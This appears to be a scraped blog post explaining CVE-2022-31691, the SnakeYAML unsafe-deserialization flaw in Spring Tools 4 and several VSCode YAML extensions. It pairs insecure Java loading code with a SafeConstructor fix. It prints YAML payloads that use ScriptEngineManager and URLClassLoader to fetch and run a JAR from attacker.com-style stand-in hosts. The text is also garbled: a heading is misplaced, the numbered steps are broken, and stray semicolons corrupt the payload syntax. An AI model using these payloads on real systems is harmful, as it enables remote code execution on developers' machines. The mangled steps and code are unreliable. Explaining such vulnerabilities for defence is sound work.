CVE-2022-31691 - How Snakeyaml in Spring Tools and VSCode Extensions Opened the Door to Remote Code Execution

In July 2022, a security issue was discovered affecting a range of popular developer tools: Spring Tools 4 for Eclipse, as well as several VSCode extensions ({Spring Boot Tools, Concourse CI Pipeline Editor, Bosh Editor, and Cloudfoundry Manifest YML Support}). The problem sources back to their use of the Snakeyaml library, a widely relied-on component for editing and parsing YAML files. At the heart, CVE-2022-31691 allows attackers under specific circumstances to run dangerous code by manipulating YAML files. If you use YAML in your day-to-day work, it's important to understand how this exploit works and how to protect yourself.

Cloudfoundry Manifest YML Support

These tools all use the Snakeyaml library for providing YAML support—enabling features like IntelliSense, code completion, and schema valiation for YAML files.

What Went Wrong: The Snakeyaml Problem

Under normal use, the Snakeyaml library safely parses YAML files. But, under certain conditions, Snakeyaml allows special Java object instantiation syntax directly inside YAML documents.

If an application parses an attacker-controlled YAML file without proper restrictions, an attacker can trigger the library to create arbitrary (unexpected) Java objects. If those objects have risky methods (like ones that execute system commands when created), the attacker can turn a simple YAML file into a Remote Code Execution (RCE) attack.

The Dangerous Syntax

YAML files handled by Snakeyaml don't just represent data. They can include instructions to create whole Java objects using the !!class syntax.

Here's an example of an unsafe YAML object creation

!!java.net.URL [ "http://attacker-domain.com/malware.jar"; ]

But it doesn't stop there. Imagine an attacker wants to execute a shell command via the YAML file: they can abuse certain Java classes with side effects, like running processes during object initialization.

Here's the classic case with Snakeyaml and Java's javax.script.ScriptEngineManager

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://attacker.com/malicious.jar";]
  ]]
]

When this YAML is parsed, Java will try to load and execute code from the attacker's JAR file.

The attacker crafts a malicious YAML like the above.

2. The developer's tool (Eclipse/VSCode extension), running locally, parses the YAML using Snakeyaml with full type support enabled.

Snakeyaml instantiates Java objects as demanded by the YAML content.

4. An object like ScriptEngineManager triggers code to be pulled and run from an attacker-controlled URL, or even runs shell commands directly.
5. Result: the attacker executes arbitrary code on the victim's machine, bypassing most classic defenses.

Which Code Is Dangerous?

The critical vulnerability lies in how Snakeyaml loads YAML files. If you allow untrusted YAML files without restricting type resolution, here's an example of risky code in Java:

Yaml yaml = new Yaml();
// BAD: Loads YAML and allows arbitrary object instantiation!
Object obj = yaml.load(yamlInputStream);

To mitigate

// Use SafeConstructor or LoaderOptions to restrict what can be instantiated
LoaderOptions options = new LoaderOptions();
options.setAllowDuplicateKeys(false);
Yaml yaml = new Yaml(new SafeConstructor(options));
Object obj = yaml.load(yamlInputStream);

In many of the affected tools, the default insecure constructor was used, opening the door to exploits.

Official References & Patches

- Spring Security Advisory: CVE-2022-31691
- NVD CVE Detail: CVE-2022-31691
- Snakeyaml issue tracker
- Mitigation Patch Example

YAML Best Practices: Never parse YAML from untrusted sources with default constructors.

3. Audit Usage: If your own projects use Snakeyaml, audit for !!class use, and lock down your constructors as shown above.

Summary: Simple, but Dangerous

CVE-2022-31691 is an example of how even developer tools and code editors can introduce severe security risks if not careful with third-party libraries. YAML files aren't always "just data"—when deserialized by powerful libraries like Snakeyaml, they can execute operations just as potent as many exploits found on servers.

*If you use YAML in Java projects or rely on Eclipse/VSCode plugins for Spring, make sure you’re patched and aware. As always, treat configuration files from unknown sources as the serious risk they can be.*


*For more details, read the original advisory from Tanzu VMware and check the official VSCode Extensions marketplace for update notes.*

Timeline

Published on: 11/04/2022 19:15:00 UTC
Last modified on: 11/14/2022 15:19:00 UTC